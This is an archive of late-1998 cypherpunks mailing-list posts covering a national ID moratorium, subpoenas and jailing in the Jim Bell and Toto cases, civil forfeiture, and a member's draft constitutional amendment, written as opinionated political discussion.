standard under docket No. NHTSA 98-3945 (relating to section 656(b) of the
Illegal Immigration Reform and Responsibility Act of 1996).

"National Health Identifiers:

None of the funds made available in this Act may be used to promulgate or
adopt any final standard under section 1173(b) of the Social Security Act
(42 USC 1320-d-2(b)) providing for, or providing for the assignment of, a
unique health identifier for an individual (except in an individual's
capacity as an employer or a health care provider), until legislation is
enacted specifically approving the standard."

The moratorium, now in place, will provide needed time for opponents to
draft legislation to repeal both the National ID and the Medical ID. The
process is expected to bring major debate over the issue. Smith and others
have used illegal immigration problems as their primary justification for
the need to give every American both identifying numbers.

House Majority Leader Dick Armey, R-TX, Rep. Ron Paul, R-TX, and Rep. Bob
Barr, R-GA, are reported to be planning repeal legislation next year. None
of their offices were able to be reached for comment on the success of the
moratorium in the Omnibus Bill. It had been reported previously that all
three had urged Gingrich to allow the moratorium to stand.

Responsibility for the design and implementation of the cards has been given
to the National Highway Traffic Safety Administration of the Department of
Transportation. That agency has recently published the proposed "Driver's
License/SSN/National Identification Document," which contains the guidelines
which must be in force by Oct. 1, 2000. The "Notice of Proposed Rule Making"
sets out the standards for each state to follow in the design of
"identification documents."

The DOT solicited public comments on their plans for implementation of
Section 656 (b) of the act earlier this year. The public comment period has
just closed and many thousands of letters in opposition were received,
according to a spokesman. Five states also expressed opposition to the plan,
and only a "small number" of letters supporting the plan were known to the
spokesman, who spoke on condition that his name would not be published.

The American Association of Motor Vehicle Administrators also wrote to the
DOT and recommended repeal of the law, even though they had once been in
favor of such legislation.

"Over the past 10 years, the AAMVA has vigorously pushed Congress and the
various state motor vehicle directors to implement policies to require the
submission of social security numbers as a condition for issuance of
driver's licenses. This resounding defeat may spell the end of their
ill-fated quest," said Scott McDonald, a grass-roots activist who operates
the "Fight the Fingerprint" website. He is able to mobilize thousands of
activists on a national basis using his e-mail notification system.

"There is no satisfactory condition under which Social Security Numbers may
be required as a condition for travel," said McDonald. "The victory's
definitely not yet won. During these lull periods there's an opportunity for
proponents of these issues to let opposition die down and all of a sudden,
pop, it goes through without anyone even aware of it.

"I don't see how the Department of Transportation could go forth with
implementing the regulation with all that strong opposition to it. Even five
states wrote letters of strong opposition to requiring Social Security
numbers," said McDonald.

Although he was in favor of the moratorium, McDonald expressed concerns
about the difficulty in getting complete repeal of the law. He said many
activists may now regard the issue as being resolved, when the toughest part
of the battle is still ahead.

"For a year we're safe," said Lisa Dean of the Coalition for Constitutional
Liberties, another organization that has been actively campaigning against
the provisions of Section 656 (b). She agreed that the toughest part of her
organization's challenge is in front of her.

Now that a moratorium is in place for a year, Dean expects repeal efforts
will also include finding alternative ways to resolve the concerns about
illegal immigrants, although no recommendations are in place as yet.

=======================================================================
Don't believe anything you read on the Net unless:
1) you can confirm it with another source, and/or
2) it is consistent with what you already know to be true.
=======================================================================
Reply to: <fingerprint@networkusa.org>
=======================================================================
 To subscribe to the free Scan This News newsletter, send a message to
     <majordomo@efga.org> and type "subscribe scan" in the BODY.
    Or, to be removed type "unsubscribe scan" in the message BODY.
   For additional instructions see www.efga.org/about/maillist.html
-----------------------------------------------------------------------
             "Scan This News" is Sponsored by S.C.A.N.
           Host of the "FIGHT THE FINGERPRINT!" web page:
                www.networkusa.org/fingerprint.shtml
=======================================================================




****************************************************
To subscribe or unsubscribe, email:
     majordomo@majordomo.pobox.com
with the message:
     (un)subscribe ignition-point email@address

or (un)subscribe ignition-point-digest email@address
****************************************************
www.telepath.com/believer
****************************************************

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Oct 1998 00:49:58 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Irony
In-Reply-To: <199810232210.AAA31880@replay.com>
Message-ID: <v03130302b257b11a8ade@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 8:16 AM -0700 10/24/98, Vin McLellan wrote:
>At 04:19 PM 10/23/98 +0200, Mok-Kong Shen wrote:
>
>>>> Dear Friend,
>>>
>>>I don't know the English term but in my native language what is
>>>described is call 'chaining letters', supposed to be a method to
>>>become rich very rapidly. That was illegal, though.
>
>At 6:10 PM -0400 10/23/98, Anonymous wrote:
>
>>In my language we have something called humor, which some
>>taxonomize with terms like irony, sarcasm, wit, etc.
>
>	In Spanish, Italian, and Portuguese, we have this concept called
>charity, which some taxonomize with terms like tolerance and benevolance.
>Think of it as a reticence to be snide, petty, or sarcastic at the expense
>of others.

Well, as long as we're comparing languages, let me throw in German.

In German we have this concept called "schadenfreude," which basically
means "delight at the misfortune of others."

Or, more Calvinistically, delight that the chickens have come home to
roost, that evolution is indeed working, and that people are getting what
they earned.

I see it all around me. Keeps me going.

--Tim May


Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 24 Oct 1998 22:39:22 +0800
To: cypherpunks@toad.com
Subject: MIB Subponeas
Message-ID: <199810241358.JAA15466@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Toad has encouraged publication of any other subpoenas 
in the Toto-assassination case, and we've asked for info on 
any other solicitations by the MIBs to list subscribers, or others, 
such as that to Alan Greenspan posted here.

It's understandable that anyone served or solicited might 
want to keep that private, upon legal advice, or for self-protection.

However, it'd be a help to those of us awaiting the slug, or wanting
to aid and abet the MIB-fed fictional conspiracy, to know what is 
happening. For example, the dates of contact, when the documents 
were served and the means used, what was asked for, or anything 
that might be shared without necessarily identifying who was 
contacted. Anon to the list or to jya if preferred.

For example, Alcatraz's subpoena was dated October 9, for a
GJ session on November 10. We don't know when the subpoena 
was served or how. And how those dates and compare to those 
of Huntsville's, though in latter case we've been told the subpoena 
came with two MIBs.

JYA'd like to be in Tacoma when the WWA GJ is MIB imaginary
totostimony, either in response to character-assassinatory 
subpoena or by idly hanging out with attention-seeking gov 
assassination-groupies,  so some times and dates would be 
helpful if different from November 10.

Bee in the bonnet: A few days before CJ's arrest warrant was issued 
the DoJ put out a study on the "Shared Traits of Potential Assassins:"

   http://jya.com/ojp80598.htm

The traits:

    * To achieve notoriety or fame.
    * To bring attention to a personal or public problem.
    * To avenge a perceived wrong; to retaliate for a perceived injury.
    * To end personal pain; to be removed from society; to be killed.
    * To save the country or the world; to fix a world problem.
    * To develop a special relationship with the target.
    * To make money.
    * To bring about political change.

What? The ambitious MIB job description mirrors the Cypherpunk agenda?

The PR on the report goes on:

      The report outlines how law enforcement agencies can establish programs
  and systems to identify and prevent persons with the means and interest to
  attack a protected person.  The guide may also assist law enforcement and
  security agencies responsible for investigating and preventing other
kinds of
  targeted violence, such as stalking, domestic violence or workplace
violence.
  The report takes law enforcement agencies through the entire threat
assessment
  process, from designing a protective intelligence program to investigating
  suspicious persons to closing a case.
      Protective intelligence programs are based on the idea that the risk of
  violence is minimized if persons with the interest, capacity and willingness
  to mount an attack can be identified and rendered harmless before they
  approach a protected person.
      To obtain a copy of "Protective Intelligence and Threat Assessment
  Investigations" (NCJ 170612, 59 pp.), contact the National Criminal Justice
  Reference Service at 800-851-3420.

Amazing coincidence, this matching of Justice with the Cypherpunk
missions. MIB aiding and abetting MIB.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 Oct 1998 23:44:44 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en (fwd)
Message-ID: <199810241532.KAA15947@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 24 Oct 1998 12:40:02 +0200 (CEST)
> From: DOOM Anonymous Untraceable User <nobody@seclab.com>
> Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en

> We also have people who *have* kept their noses clean being harassed. It's an 
> excuse to put some pressure on CDRs. It even had the effect of shaking loose
> a lot of the Austin cypherpunks in a nice little divide and conquer action.

That's not exactly correct. The Austin Cypherpunks have always had a problem
with cohesion. There were issues that were leading me toward dropping my
personal support because of lack of committment from other parties in the
Austin Cypherpunks. This certainly hastened the event, it did not cause it.
We were already divided in our goals and interest and unable to agree on
agenda or purpose. We, as a group, couldn't even decide to spend the few
dollars to put the 3-line RSA in the local paper. The last effective action
we took was the speaking engagement at the last RoboFest here in Austin 3
years ago. That sort of "I want to participate, but won't do anything"
attitude raises the hackles on my neck. Life is way too short to be wasting
major effort on a lost cause. There wasn't much to divide and the spoils
going to the conquerer are/were nil.

> And it's likely they have subpoenaed more people than we've heard from.
> I just hope they don't subpoena Bill Payne, or we'll receive a copy of it 
> every week for years to come.

Yep, with those silly/strange capitalizations and sentence structures of his
which look suspicously like some form of stego. You'd think somebody who
claims to be that educated would have at least learned basic grammer (unless it
was intentional).

> The John Gilmore subpoena was focussed exclusively on cypherpunk email.
> Jim Choate confirmed his is much the same.

Other than dates and signatures it's identical. The focus was on any
archives that I kept of cpunks or personal traffic (part c) that involved
CJ in my interview.

> So the focus is on what we've
> all seen posted here. Personally, I found them a lot milder than Reeza!'s 
> projection of his suicide fantasies, for instance.

I would also agree that the Cypherpunks have garnered a notoriety with LEA's
such that it could/should be taken as a given that continous surviellance is
occurring. Random dumpster diving in our trash, etc. should not be
unexpected.

This does raise an interesting point about freedom of speech and the duties
of LEA's. In a democratic society what are the ethical implications of LEA's
archiving publicly available documents as a matter of course, not for
inclusion in ongoing investigations but rather as a base for future
investigations. In addition, while the remailer operators do seem to be
protected by ECPA (I was advised that I fell into this category via SSZ)
what about the public archive operators? Are they covered under this
umbrella?


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 24 Oct 1998 23:42:42 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Forwarded mail...
Message-ID: <199810241537.KAA16012@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Sat, 24 Oct 1998 16:52:18 +0200
> From: Anonymous <nobody@replay.com>

>   "Anything not Permitted, is Forbidden."

 
				ARTICLE IX. 
 
	The enumeration of the Constitution, of certain rights, shall 
not be construed to deny or disparage others retained by the people. 
 


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vin McLellan <vin@shore.net>
Date: Sun, 25 Oct 1998 00:16:36 +0800
To: cypherpunks@toad.com
Subject: Re: Irony
In-Reply-To: <199810232210.AAA31880@replay.com>
Message-ID: <v04003a00b2579978e398@[198.115.179.81]>
MIME-Version: 1.0
Content-Type: text/plain



At 04:19 PM 10/23/98 +0200, Mok-Kong Shen wrote:

>>> Dear Friend,
>>
>>I don't know the English term but in my native language what is
>>described is call 'chaining letters', supposed to be a method to
>>become rich very rapidly. That was illegal, though.

At 6:10 PM -0400 10/23/98, Anonymous wrote:

>In my language we have something called humor, which some
>taxonomize with terms like irony, sarcasm, wit, etc.

	In Spanish, Italian, and Portuguese, we have this concept called
charity, which some taxonomize with terms like tolerance and benevolance.
Think of it as a reticence to be snide, petty, or sarcastic at the expense
of others.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Sun, 25 Oct 1998 03:07:19 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Feds Seize Houses for Illegal Downloading
In-Reply-To: <199810241742.MAA04232@wire.insync.net>
Message-ID: <v03130303b257cea3829a@[209.66.100.110]>
MIME-Version: 1.0
Content-Type: text/plain



At 10:42 AM -0700 10/24/98, Eric Cordian wrote:
>Here's an interesting civil forfeiture story.  Feds catch a guy
>downloading naughty child pictures in a multinational raid, and
>immediately file to seize his house.  Guy commits suicide.
>
>Feds say that civil forfeiture of homes where improper downloading
>takes place is a wonderful new weapon in the WarOnSomeThoughts(tm),
>and that they plan to do a lot more of it in the future.
>
>     http://www.dallasnews.com/national-nf/nat83.htm
>

What else should the sheeple expect? They've let the cops and narcs expand
their power for the past several decades.

Thoughtcrime means your house gets taken away...why didn't Orwell think of it?

(Before anyone claims that downloading certain images may be more than
thoughtcrime, bear in mind that the age of consent may be different in
other countries and that the antichildporn laws cover cartoons, synthetic
images, and images or representations or even stories...even where no real
human being is used as a model.)

Thoughtcrime.


--Tim May

Y2K: A good chance to reformat America's hard drive and empty the trash.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: DOOM Anonymous Untraceable User <nobody@seclab.com>
Date: Sat, 24 Oct 1998 18:58:29 +0800
To: cypherpunks@cyberpass.net
Subject: Re: so, what did Toto *do*, exactly to get locked up? (Re: rules of en
Message-ID: <199810241040.MAA16934@rogue.seclab.com>
MIME-Version: 1.0
Content-Type: text/plain





Adam Back wrote:
> Anonymous wrote:
> > Adam Back wrote:
> > > That is to say, I suspect that Jim would not have been locked up if he
> > > had not a) used false social security numbers, b) not been involved
> > > with fake courts, c) not collected IRS employees home addresses, and
> > > d) not planted the stink bomb.
> >
> > And, more importantly, if crypto-anachy and removal of governments
> > weren't on the cypherpunk agenda.
> 

...

> It is difficult to tell exactly why Jim was incarcerated because the
> IRS people may have alternate motives.  However, I suspect Jim Bell's
> woes are more to do with involvement with the fake courts, and the use
> of real IRS employees names and addresses, which was then taken to be
> an immediate threat, taken with the AP rant printout they found in his
> car.  I presume in reality he just collected the addresses to have the
> fake court serve them with some legal documents.  I also presume the
> reason the IRS first got interested in Jim was due to tax evasion,
> and/or fake court documents addressed to IRS agents.

The fake court, addresses, AP manifesto are all part of one point
being made. There is no threat. Any court can see that (if it doesn't
choose not to). And we do have a system of "reasonable doubt".

Did fake SS#s alone justify incarceration? Hmmm. Dunno. crypto-anarchy sounds
scary, better be safe...

> 
> Toto is more interesting.  He seems to have been incarcerated because
> he tried to stick up for Jim Bell.  What did he do?  Set up an AP bot
> mockup, put the same IRS employees names, and a judge (I presume the
> judge that handled Jim's case) on the page with $ amounts beside them.

...

> Also what I am saying is that it makes it hard to defend people if
> they have done any number of dumb things which are the ostensible
> reason they are locked up.

I have no problem with that. I'll defend Jim Bell's AP rants, the use of
fake courts and addresses to flesh out the details. Peripheral crimes don't
make me ashamed to say "these things here are free speech".

I stated a similar view in a post a while ago about Clinton: that peripheral issues
are irrelevant. My principle was unpopular then, but I hope it gets more support
when looking at Jim/Toto. I'm outraged that mischievous acts would get higher
penalty just because these guys believe in the cypherpunk agenda. Or make unpopular
speech relating to those beliefs.

We also have people who *have* kept their noses clean being harassed. It's an 
excuse to put some pressure on CDRs. It even had the effect of shaking loose
a lot of the Austin cypherpunks in a nice little divide and conquer action.

And it's likely they have subpoenaed more people than we've heard from.
I just hope they don't subpoena Bill Payne, or we'll receive a copy of it 
every week for years to come.

> 
> > > Similarly with Toto, the rants would have been ok, without a) the
> > > mockup non-functional "bomb" symbolically planted in the court house
> > > basement or where-ever it was, b) using real IRS employees, and judges
> > > names in his rant (apparently in support of Jim Bell), c) having
> > > tourettes syndrome.
> >
> > The rants are ok anyway. They are clearly metaphors. But the
> > prosecutors aren't playing fair.  The man is "dangerous". And not
> > because he wrote "bomb" in crayon on a cardboard box. But because he
> > made waves. Waves that we caught.  Waves that the straights and
> > sheeple might catch.

Correct that. Waves that will upset the straights and sheeple.

> 
> I'd be interested in opinions on why they locked up Toto.  The legal
> docs John Young obtained and put on up on the web (look at the bottom
> of http://www.jya.com cryptome page for `Carl Johnson'), says that it
> is because he made a threat.
> 
> What about the following excerpt from the Toto post below could be
> construed to constitute a danger, or did Toto get locked up because he
> walked right up to the IRS and said "Fuck You", and "here I am come
> and get me".

The John Gilmore subpoena was focussed exclusively on cypherpunk email.
Jim Choate confirmed his is much the same. So the focus is on what we've
all seen posted here. Personally, I found them a lot milder than Reeza!'s 
projection of his suicide fantasies, for instance.

> 
> I have inserted the odd comment.  Anyone like to comment on how likely
> a case by the IRS based on this post by `Toto' is to stick?  The AP
> bot mockup I think was clearly not a credible threat, it was
> completely non-functional.
> 
> Adam

[Toto repost snipped]

Well, there's certainly nothing threatening anyone at whitehouse.gov, which explains
why they aren't prosecuting.

I didn't think there was any credible threat. Even the talk about fighting censorship
by acting in MeatSpace could mean he'll talk to people in person if his internet use
is compromised. That's the way I read it the first time. If it were a threat, who is
it against?

At worst you'd have to talk about Toto as having made a public nuisance. He's already
served more time than that's worth.

Even taking one post out of the Toto stream is misleading. You have to consider 
the style of writing. Did space aliens really steal his drugs? Or does he speak
in metaphor? If Toto's full of shit, you must acquit.

The only threat is of cypherpunks against the IRS's relevance.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Cordian <emc@wire.insync.net>
Date: Sun, 25 Oct 1998 02:00:09 +0800
To: cypherpunks@cyberpass.net
Subject: Feds Seize Houses for Illegal Downloading
Message-ID: <199810241742.MAA04232@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Here's an interesting civil forfeiture story.  Feds catch a guy
downloading naughty child pictures in a multinational raid, and
immediately file to seize his house.  Guy commits suicide.
 
Feds say that civil forfeiture of homes where improper downloading
takes place is a wonderful new weapon in the WarOnSomeThoughts(tm),
and that they plan to do a lot more of it in the future.
 
     http://www.dallasnews.com/national-nf/nat83.htm
 
Some exerpts....
 
Kenneth Nighbert lived a block from the beach in Kennebunk, Maine. Two
weeks ago, the retired Air Force pilot flew his American flag upside
down from his second-floor sun deck, a universal cry for help. Then he
went inside, tied a plastic bag around his head and died.
 
...
 
People who think they're indulging in forbidden fantasies in the
solitude of their homes, only to be interrupted by a firm knock on
their doors in the dead of night.
 
...
 
The suspects range from a high school teacher to a 15-year-old boy to
a quadriplegic man. Three women also were caught in the sweep.
 
...
 
On the night of the Sept. 3 raids, Kennebunk police and Customs
authorities crept up to Mr. Nighbert's home and peered through a back
window, said Sgt. David Gordon.
 
...
 
Mr. Nighbert was charged with possession of child pornography, a
felony punishable by up to 20 years in prison, and authorities
simultaneously filed a civil action seeking forfeiture of the house,
which was assessed at $168,000 and owned jointly with his sister. Mr.
Nighbert was freed on $10,000 bond.
 
"He was obviously extremely upset and nervous and, actually, crying at
the time he appeared in court," said U.S. Attorney Jay McCloskey.
 
Mr. Nighbert's lawyer, Rick Berne, said he believed his client was
facing too harsh a penalty for someone who only downloaded pictures.

--  
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 25 Oct 1998 01:59:14 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: An amendment proposal...
Message-ID: <199810241750.MAA16681@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



                                 ARTICLE

Preamble.   This amendment to the Constitution of the United States is
            intended to address interpretational issues of the same.
            Should it not pass within seven (7) years from consideration
            then it shall be deemed removed.

Section 1.  We the people re-affirm our role as the sole fundamental
            authority in the United States of America. All other political,
            civil, criminal, and legislative authority derives from it.
            Re-affirming the integrity and respect due the 9th and 10th
            Amendments. And further clearly affirm the equality of the
            federal & state governmental bodies with that of the people.
            There is no heirarchy of authority between the three. We
            further clearly stipulate that any right of the people is
            to be fully and honorably respected to the individual.

Section 2.  We the people re-affirm the supreme authority of the
            Constitution over all courts and rulings thereof, including
            the Supreme Court of the United States of America. As directed
            by the 9th Amendment, no case brought before a judicial body
            may be based on whether a citizen has a right not described
            in the Constitution. And further, as required by the 10th
            Amendment, all legislative and regulatory rulings shall be
            delegated by at least one sentence in the Constitution, without
            exception. When making consideration of such Constitutional
            support the Constitution must be considered point by point and
            as a whole.

Section 3.  The exact nature of the 1st. Amendment and Congressional
            authority has been brought into consideration. The 1st Amendment
            coupled with the 9th and 10th Amendments clearly stipulate that
            these issues are resolved at the state or individual level. All
            current and future legislation must respect these, and other,
            prohibitions in the Constitution of the United States of
            America in full and without exception.

Section 4.  The exact nature of the 2nd. Amendment and Congressional authority
            has been brought into consideration. The 2nd Amendment prohibits
            any law, not just Congress as in the 1st, from prohibiting the
            ownership of firearms to the people. This does not mean that
            both private and public agents may not regulate the carrying
            and use of such weapons within their authoritative bounds. It
            is to be further clarified that no national requirement for
            registration or licensing is permitted. States may license
            within the bounds of their individual constitutions.

Section 5.  To clarify the reporting requirements of the national budget it
            is directed that such reports be made in full and in public
            every 20 years from the date of this amendment going into force.
            The original wording is not sufficiently clear to enforce the
            fiscal responsibilities of our elected officials. No federal
            agency or agent thereof is exempt from this reporting
            requirement.

Section 6.  The concept of individual privacy is hereby clearly recognized
            as being held by all peoples. No agency of any civil, legal,
            military, or executive authority may infringe this right without
            just cause. This right shall include all communications,
            writings, storage media, and other technologies used in the
            creation, execution, and storage. No authority within the
            United States of America may prohibit the publishing of any
            document or other media. The rights of ownership and copyright
            shall be respected to the legal holder.

Section 7.  While there is clearly a need for secrecy of governmental
            workings to protect the national interest, there is no need in
            a democracy to have this be carried indefinitely. It is to be
            directed that all materials held in any form or manner by
            the federal government or its agents shall be released in full
            to public scrutiny via the Library of Congress. These documents
            shall be required to be released 20 years after their initial
            creation. In some cases Congress may feel it necessary to extend
            this time limit. In whatever case Congress may not extend that
            lifetime in secrecy past 100 years from intial creation of the
            material.

Section 8.  A clarification of copyright. While it is clear that the
            author of a work should derive a period of just compensation
            from being a sole rights holder that requirement should not
            extend indefinitely. Congress is directed to decide on a just
            suitable time period for sole rights expression. At the end
            of that time all sole rights become public domain. The long term
            public good demands it.

Section 9.  Abortion is a social issue of which we recognize no clear
            solution without repressing some civil liberties. Since we
            are prohibited in principle and print from such actions we
            must decline authority in these issues. Per the 10th Amendment
            we recognize the supremacy of the state constitutions and
            legislative bodies in this matter. However the individual
            states may decide the issue the federal government will provide
            full support and protection to each from violent oppossition
            from within or without the individual states.

Section 10. The federal government is required to guarantee representative
            governments in all states. This does not include requiring any
            particular form or function within those states representative
            governments, only that they be representative. The federal
            government may not withhold federal services or resources of
            which state derived tax dollars are involved even if a state
            is in direct violation of federal laws and regulations.

Section 11. The use of military forces or its resources in and for civilian
            law enforcement operations within the borders of the United
            States of America, and its territories and protectorates is
            prohibited. This prohibition is specificly to include in times
            of war or civil unrest. The only permissible use of such forces
            is in disaster recovery and in those cases they are released to
            state control. The only Constitutionaly authorized force for
            insurrection and civil unrest is the Militia. It is permitted
            to transfer a unit from the regular military to the militia.
            Such a transfer requires all lines of authority and
            responsibility to derive from the militia. Such a move must
            be authorized by Congress except in times of war where such
            authorization is considered implicit.

Section 12. Membership in the military, law enforcement, or other civil
            position is sufficient for the infringment of any civil
            liberties. Democracies don't give up democracy to protect
            democracy.

Section 13. Public law enforcement agents are prohibited from unnecessarily
            putting the people in danger. This shall include actions or
            rulings which put the people in danger. We further stipulate
            that the police are to be held accountable for their actions
            which result in negligent or criminal consequences. The concept
            of civil or legal agents being exempt from consequences because
            of office are repudiated. The people who swear an oath to uphold
            the laws of this land are not exempt in any situation from
            those laws.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 25 Oct 1998 02:09:56 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: An amendment proposal... (fwd) [one typo fixed]
Message-ID: <199810241756.MAA16796@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From: Jim Choate <ravage@einstein.ssz.com>
> Subject: An amendment proposal...
> Date: Sat, 24 Oct 1998 12:50:30 -0500 (CDT)

> Section 12. Membership in the military, law enforcement, or other civil
>             position is sufficient for the infringment of any civil
                         ^
                        not

>             liberties. Democracies don't give up democracy to protect
>             democracy.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sun, 25 Oct 1998 02:10:38 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: BOUNCE cypherpunks@ssz.com: Admin request (fwd)
Message-ID: <199810241805.NAA16917@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:
>From owner-cypherpunks@ssz.com Sat Oct 24 13:00:48 1998
Date: Sat, 24 Oct 1998 13:00:47 -0500
Message-Id: <199810241800.NAA16897@einstein.ssz.com>
To: owner-cypherpunks@einstein.ssz.com
From: owner-cypherpunks@einstein.ssz.com
Subject: BOUNCE cypherpunks@ssz.com: Admin request

>From cypherpunks-owner@ssz.com  Sat Oct 24 13:00:43 1998
Received: (from cpunks@localhost) by einstein.ssz.com (8.6.12/8.6.9) id NAA16886 for cypherpunks@ssz.com; Sat, 24 Oct 1998 13:00:41 -0500
Received: from www.video-collage.com (cpunks@www.video-collage.com [206.15.171.132]) by einstein.ssz.com (8.6.12/8.6.9) with ESMTP id NAA16879 for <cpunks@EINSTEIN.ssz.com>; Sat, 24 Oct 1998 13:00:38 -0500
Received: (from cpunks@localhost)
	by www.video-collage.com (8.9.1a/8.9.1) id NAA16887;
	Sat, 24 Oct 1998 13:49:14 -0400 (EDT)
Received: from systemics.ai (mail@systemics.ai [209.88.68.48])
	by www.video-collage.com (8.9.1a/8.9.1) with ESMTP id NAA16697
	for <cypherpunks@algebra.com>; Sat, 24 Oct 1998 13:49:10 -0400 (EDT)
Received: from mises.systemics.ai [209.88.68.61] (mail)
	by systemics.ai with esmtp (Exim 2.04 #1 (Debian))
	id 0zX7op-0007VO-00; Sat, 24 Oct 1998 13:49:39 -0400
Received: from ryan by mises.systemics.ai with local (Exim 2.02 #1 (Debian))
	id 0zX7oK-0002qp-00; Sat, 24 Oct 1998 13:49:08 -0400
Date: Sat, 24 Oct 1998 13:49:08 -0400
To: cypherpunks@algebra.com
Subject: new mailing list for hardware tamper-resistance
Message-ID: <19981024134908.K25817@mises.@>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
X-Mailer: Mutt 0.94.11i
From: Ryan Lackey <ryan@systemics.ai>

I've created a new mailing list, called "tamper-resist", for technical/etc.
discussions of tamper resistance, both through distributed techniques
and hardware tamper resistance.  It's hosted at venona.com.  To subscribe,
send mail to tamper-resist-request@venona.com.

I encourage people to crosspost, etc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Sun, 25 Oct 1998 02:17:12 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Mad Monger Artist
Message-ID: <3632155C.E5BB3F6A@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain



Oct. 24,

Some Mad Artist had let loose. In a wild fit, the world was spattered in
colors and textures that no sound mind could ever hope of even dreaming
of. Reality was being stretched to its limits, and beyond. On this
autumn day, the world was on fire. Sunlight was illuminating every
particle, every particle was humming, each collision was a spark. The
sparks flashed beyond the field and periphery of my conception.

I drew the curtains on the meager, pale distraction of fall foliage
outside my window, and got back to reading "The latest news from Toto",
or "The Keyboard as a Long/Bottleneck."

Then, Mr. Young's disclosure, DoJ's "Shared Traits of Potential
Assassins:" Sometimes you see those "Wanted's" posted in the post office
and think, "Jeeze, looks a little like me." Then you try to remember
where you were during all those blackouts and fuzzy periods. Well, I
looked at DoJ's STOPAsses and thought ( with a Homer Simpsonesque voice
balloon appearing above my head), "That, ...sounds like me."

My next thought was more comforting, Gov'STOPA was a description of the
species in general; both in suits and out, behind the counter and
before, in front of the camera and behind the scope, in the
(gas)chambers and on the lever/gavel. But hey, admitting you fit the
profile is kinda like raising your hand. So I'll sit quietly in the back
